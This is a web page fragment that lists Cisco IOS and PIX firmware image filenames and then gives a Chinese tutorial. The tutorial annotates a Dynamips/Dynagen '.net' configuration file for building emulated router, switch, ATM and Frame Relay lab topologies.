│ │ │ c2500-jos56i-l.121-18.bin 15.61 MB
│ │ │ c2600-i-mz.122-8.T5.bin 5.58 MB
│ │ │ c2600-is-mz.122-2.XT.bin 12.14 MB
│ │ │ c2600-jk9s-mz.122-12a.bin 12.07 MB
│ │ │ c2600-js-mz_121-5_T.bin 10.89 MB
│ │ │ c2600-jsx-mz.122-8.T.bin 7.06 MB
│ │ │ c2600-p-mz.991126 6.42 MB
│ │ │ c2950-i6q4l2-mz.121-6.EA2c.bin 2.15 MB
│ │ │ c3500xl-c3h2s-tar.120-5.WC13.tar 2.80 MB
│ │ │ c3550-i5k2l2q3-tar.121-11.EA1.zip 5.31 MB
│ │ │ c3550-i5q3l2-tar.121-12c.EA1.zip 5.30 MB
│ │ │ c3550-i5q3l2-tar.121-8.EA1c.bin 4.88 MB
│ │ │ c3550-ipservicesk9-tar.122-25.SEC2.tar 8.19 MB
│ │ │ c3550-ipservicesk9-tar.122-25.SEE2.tar 8.62 MB
│ │ │ c3620-is-mz_121-5_T.bin 10.19 MB
│ │ │ c3640-i-mz.120-7.T.bin 4.49 MB
│ │ │ c3640-ik8s-mz.122-15.t11.bin 17.60 MB
│ │ │ c3640-ik9o3s-mz.122-8.T10.bin 14.76 MB
│ │ │ c3640-is-mz.120-7.T.bin 7.76 MB
│ │ │ c3640-is-mz.123-8.T_96_32_Plus.bin 21.31 MB
│ │ │ c3640-js-mz.122-8.T.bin 15.22 MB
│ │ │ C3640-Jsx-Mz 123-6.bin 17.82 MB
│ │ │ c3660-jo3s56i-mz.120-7.XK2.bin 10.79 MB
│ │ │ c3660.rar 13.34 MB
│ │ │ c3750-advipservicesk9-tar.122-25.SEE.tar 9.77 MB
│ │ │ c5300-i-mz.120-5.T1.bin 4.28 MB
│ │ │ c5300-is-mz.120-7.T.bin..bin 6.70 MB
│ │ │ c5300-jk9s-mz.122-2.XB3.bin 11.55 MB
│ │ │ c5350-jk8s-mz.122-11.T.bin 14.10 MB
│ │ │ c5350-js-mz.122-15.T1.bin 14.49 MB
│ │ │ c7200-is-mz.19991126 7.81 MB
│ │ │ c7200-js-mz.122-11.T.bin 15.71 MB
│ │ │ c7200-tipv6-mz.0519 3.04 MB
│ │ │ C800-K9osy6-Mw 123-3a.bin 1.63 MB
│ │ │ c800-k9osy6-mw.122-15.T12.bin 7.49 MB
│ │ │ Device_Manager.rar 10.19 MB
│ │ │ rsp-jsv-mz.122-12a.bin 16.43 MB
│ │ └─PIX (0 folders, 8 files, 14.63 MB, 14.63 MB in total.)
│ │ bh515.bin 270.00 KB
│ │ bh61.bin 216.00 KB
│ │ np63.bin 90.00 KB
│ │ np70.bin 126.00 KB
│ │ pix515.bin 1.63 MB
│ │ pix615.bin 2.48 MB
│ │ pix635.bin 2.00 MB
│ │ pix721.bin 7.82 MB
│ │ 。。。。。。
Série c1600
Série c1700
c1700-bk9no3r2sy7-mz.123-7.XR.bin
c1700-Advipservicesk9-Mz 123-7 T.bin
C1700-Advsecurityk9-Mz.123-15.bin
c1700-advsecurityk9-mz.123-9a.bin
c1700-bk9no3r2sv8y7-mz.123-4.XK2.bin
c1700-entbase-mz.123-14.T3.bin
c1700-ipvoice-mz.123-11.T5.bin
c1700-ipvoice-mz.123-7.XR3.bin
C1700-K9o3sv8y7-Mz 123-12a.bin
c1700-k9o3sv8y7-mz.123-11.T5.bin
c1700-k9o3sv8y7-mz.123-7.T6.bin
c1700-k9o3sy7-mz.123-9a1720.bin
c1700-spservicesk9-mz.123-11.T5.bin
c1700-spservicesk9-mz.123-15.bin
Série 1841
c1841-broadband-mz.123-11.T3.bin
Série 2500
Série 2600
c2600-io3s56i-mz_120-5_XK1.bin
C2600-Advsecurityk9-Mz.123-5a.bin
c2600-advsecurityk9-mz.123-12.bin
c2600-advipservicesk9-mz.123-4.T6.bin
Série c2900
c2900xl-c3h2s-tar.120-5.WC7.zip
Série c2950
c2950-i6q4l2-mz.121-6.EA2b.bin
c2950-i6q4l2-mz.121-6.EA2c.bin
c2950-i6q4l2-mz.121-9.EA1d.bin
c2950-i6q4l2-tar.121-12c.EA1.zip c2950-i6q4l2-tar.121-9.EA1.zip
Série c3550
c3550-i5k2l2q3-tar.121-11.EA1.zip
c3550-i5q3l2-tar.121-12c.EA1.zip
c3550-i5q3l2-tar.121-8.EA1c.bin
Série c3600-2600
c3600-2600-analog-fw.1.2.2.bin
Série c3620
Série 3631
c3631-telcoent-mz.123-2.T1.bin
Série c3640
c3640-is-mz.123-8.T_96_32_Plus.bin
Série c3660
c3660-jo3s56i-mz.120-7.XK1.bin
c3660-jo3s56i-mz.120-7.XK2.bin
Série 3725
Série c5300
Série c5350
Série c7200
c7200-is-mz.123-1a.bin c7200-is-mz.123-14.T1.bin
Série PIX 634
Dynamips中net文件详解!
Google sites: http://google.ghitr.com/cisco/dynamips-zhongnet-wen-jian-xiang-jie-
[ad#ad_article_1]
Dynamips有不同版本,但目前来看它是一个路由器的模拟软件,关于交换的部分是模拟了在路由器上插不同端口。
通常我们用的是0.2.5-RC1到0.2.7-RC1中的某个版本,最新的是0.2.7-RC1。
0.2.5版本仅仅可以支持3640、3660、7200三个型号的设备,只能模拟路由器。
0.2.6-RC1之后,作者加入了在3600系列上对NM-16ESW交换模块的支持,可以支持3620、3640、3660、7200四种设备,同时解决了某些配置下,电脑CPU占用100%的问题。
0.2.7-RC1是作者最近才开发出来的,修正了不少BUG。这个版本在原有支持的设备上新增了2600、Cisco 7200 NPE-G2、Cisco 7200 new Ethernet Port Adapters。
运行方式是使用Dynagen程序,调用.net文件。Dynagen这个程序似乎不是由chris编写,而是另外的一个人制作的。其使用的.net配置 文件,逻辑性较强,更适合自己制作拓扑结构。但是它对CPU和内存的占用较高,而且如果一旦某个虚拟设备宕掉,所有开启的设备都需要重新启动。
以上简单说了Dynamips模拟器的情况,下面我们来看它的配置。我们先来看它的配置文件。注:需运行在0.2.7-RC1版本下。
以下我们截取一段配置文件,来看看它的配置方法。
黑色字体为说明。
*****************************************************************************
autostart = false
# 是否开启自动运行,如果该值为true,那么你运行程序后,所有的设备都会自动启动(如果设备有很多,那将是个灾难),建议设置为false,以后用哪个开那个就可以了。
[localhost]
port = 7200
udp = 10000
# 以上是设置所有的虚拟设备使用的端口号,应该是定义了一个起始端口,后面的自行分配,我没有查到具体的设备端口,仅仅是猜测。# 前面的router是定义设备的类型,由此也可以看出,其实Dynamips只能模拟路由器。
后面的R1是你自己定义的设备名称,需要区别于其他设备。
image = D:\cisco IOS rom\IOS\c3640-jk9o3s-mz.124-10a.bin
# 这个就是网上下载的IOS文件路径,最好写绝对路径。
model = 3640
# 这句定义了你的路由器型号,根据不同的IOS写不同的型号,不同型号的虚拟设备有差异的,这个是3640。
console = 2001
# 这个是定义了登陆的接口,在整个配置中此值必须唯一。2001其实就是2001端口,看到上面的[localhost]了吗?那是地址,也可以用 127.0.0.1来代替。也就是说,如果你要用telnet的方式登陆,那么地址就是127.0.0.1:2001,我会专门写出SecureCRT软 件的用法。
ram = 96
# 定义这个虚拟设备使用多大的内存,可以自己试试看,如果值太小,虚拟设备启动不了的,如果你的内存够大,也可以扩大此值。
confreg = 0×2102
# 配置寄存器的值,我建议直接设置为2102,很多朋友都说配置存储不了,就是因为这个配置寄存器设成了2142。其实不是不能保存设备,而是如果配置为2142,设备启动时不会读取配置。
idlepc = 0×603e0068
# 这个数值影响了程序的性能,最好多试几个。
exec_area = 64
# 看样子象是命令或者程序的空间,但是我一直不清楚这个设置是干什么的。
mmap = true
# 如果你的内存足够大,那么可以把它设置成false,让程序完全在内存里运行。如果你和我一样,只有512M内存,那么我建议你设置为true。注意:如果设置为true,需要在程序所在的磁盘内留出一定的磁盘空间,推荐预留1G以上的空间。
slot0 = NM-1FE-TX #36系列的1端口快速以太网模块,连接虚拟交换机必须使用这个。
slot1 = NM-4T # 36系列的4端口串口模块。
slot2 = NM-1FE-TX #36系列的1端口快速以太网模块,这个用来连接其他的设备。
上面的三行显示了在虚拟设备的插槽内所使用的模块(或者叫线卡)。3640可以支持4个模块,3660支持6个。支持的模块种类后面再说。
f0/0 = SW9 1 本机的f0/0连接到了名称为SW9的设备的1端口。
s1/1 = R2 s3/0 本机的s1/1连接到了名称为R2的设备的s3/0端口。
s1/2 = FR1 1 本机的s1/2连接到了名称为FR1的设备的1端口。
f2/0 = SW1 f1/15 本机的f2/0连接到了名称为SW1的设备的f1/15端口。
以上4行显示了拓扑的连接情况,=前面的是本机的端口,=后面的是链接到的设备名称和端口。格式为:本机端口=对方名称 对方端口。一旦在这里定义了连接,则不需要在对端设备进行设置,否则会出错。
[[router R2]]
同上,这个设备叫“R2”。
image = D:\cisco IOS rom\IOS\c7200-jk9o3s-mz.124-10a.bin
这个设备使用的是7200的IOS,7200和3600可以使用的模块不一样喔。
model = 7200
定义设备为7200。
console = 2002
这个设备用2002端口登陆。
npe = npe-400
定义7200的NPE类型,具体干什么用,我还不明白,不过用这个数值就挺好。
ram = 128
7200当然要大一些的内存喽,我设置128M据说有人设置256M。
confreg = 0×2102
idlepc = 0×6074ae38
exec_area = 64
mmap = true
以上几条和第一个设备相同,是通用配置,以下不再赘述。
slot0 = PA-C7200-IO-FE 7200的1端口快速以太网模块,连接虚拟交换机必须用这个。
slot1 = PA-FE-TX 7200的1端口快速以太网模块,这个端口用来连接其他的设备。
slot2 = PA-A1 7200才支持的1端口ATM模块,36系列不支持这个的。
slot3 = PA-4T 7200的4端口串口模块。
好了,看到了嘛,36系列和72系列的模块是不一样的,自己做拓扑的时候可别弄乱了。
f0/0 = SW9 2 本机的f0/0连接到了名称为SW9的设备的2端口。
f1/0 = SW1 f1/14 本机的f1/0连接到了名称为SW1的设备的f1/14端口。
s1/2 = FR1 2 本机的s1/2连接到了名称为FR1的设备的2端口。
a2/0 = AT1 1 本机的ATM a2/0端口连接到了名称为AT1的设备的1端口。
以上是这个虚拟设备的拓扑连接,R1和R2有一条串行链路,因为在R1上进行了定义,所以不用再在这里定义了。
[[router SW1]]
这个设备叫SW1,因为它的主要功能是模拟交换机,但是设备类型依然是router。
image = D:\cisco IOS rom\IOS\c3640-telco-mz.123-11.T.bin
这次我们使用3640的IOS文件。注意:如果你想要模拟可管理的交换机,必须用3600系列的IOS,而且版本越高越好否则无法支持所需的模块。
model = 3640
console = 3001
定义登陆端口3001。
ram = 128
confreg = 0×2102
idlepc = 0×60fe8088
exec_area = 64
mmap = true
slot0 = NM-1FE-TX 36系列的1端口快速以太网模块,上面说过了。
slot1 = NM-16ESW 36系列的16端口快速以太网模块,模拟可管理交换机就靠他。
f0/0 = SW9 3 本机的f0/0连接到了名称为SW9的设备的3端口。
f1/11 = PC1 f0/0 本机的f1/11连接到了名称为PC1的设备的f0/0端口。
[[router PC1]]
这个设备叫做PC1,我们用一个路由器来模拟一台PC,可以多模拟几个,然后接到交换机上练习VLAN配置,这里就说一个。
image = D:\cisco IOS rom\ios\c3640-i-mz.112-20.P.bin
这个IOS其实没什么要求,越小越好。因为我们只需要它有个以太口,同时我们不用它什么功能,有个ping 和trace命令就够了。
model = 3640
console = 4001
虚拟PC从4001开始。
ram = 32
只要能运行,内存越小越好。
confreg = 0×2102
idlepc = 0×6017144c
exec_area = 32
mmap = true
slot0 = NM-1FE-TX 就这一个模块。
[[ATMSW AT1]]
前面的ATMSW说明这个设备是ATM交换机,后面的AT1是它的名字,方便大家连接他。这个设备不可管理,就象是ISP的设备。
1:1:100 = 2:2:200
应该是ATM的参数,但是我还没有学会ATM技术,所以这个数值我也不知道是怎么回事。以后学了再补上。
[[ethsw SW9]]
前面的ethsw说明这个设备是以太网交换机,后面的SW9是它的名字,方便大家连接他。这个设备同样不可管理。
1 = dot1q 1 端口1,封装802.1Q,属于VLAN1。
2 = dot1q 1 端口2,封装802.1Q,属于VLAN1。
3 = dot1q 1 端口3,封装802.1Q,属于VLAN1。
4 = access 1 NIO_gen_eth:\Device\NPF_{DE5D9A8A-6CC2-4F44-BEC4-4FC0EEEB566C}
这个是你物理PC的网卡,相当于你的网卡也接在了这个虚拟的交换机上,建议将网卡设置上。
[[FRSW FR1]]
前面的FRSW说明这个设备是帧中继交换机,后面的FR1是它的名字,方便大家连接他。这个设备也不可管理。
1:102 = 2:201
以上应该是帧中继交换机的虚电路,还没有比较透彻的理解帧中继,以后补吧。
*****************************************************************************
[[router R1]]
另外需要说明的是,在配置文件中你可以用“#”来进行配置语句的注释。
例如:# slot0 = NM-1FE-TX #36系列的1端口快速以太网模块
好了,.net文件就这样,我们可以自己搭建自己的拓扑了。
我自己
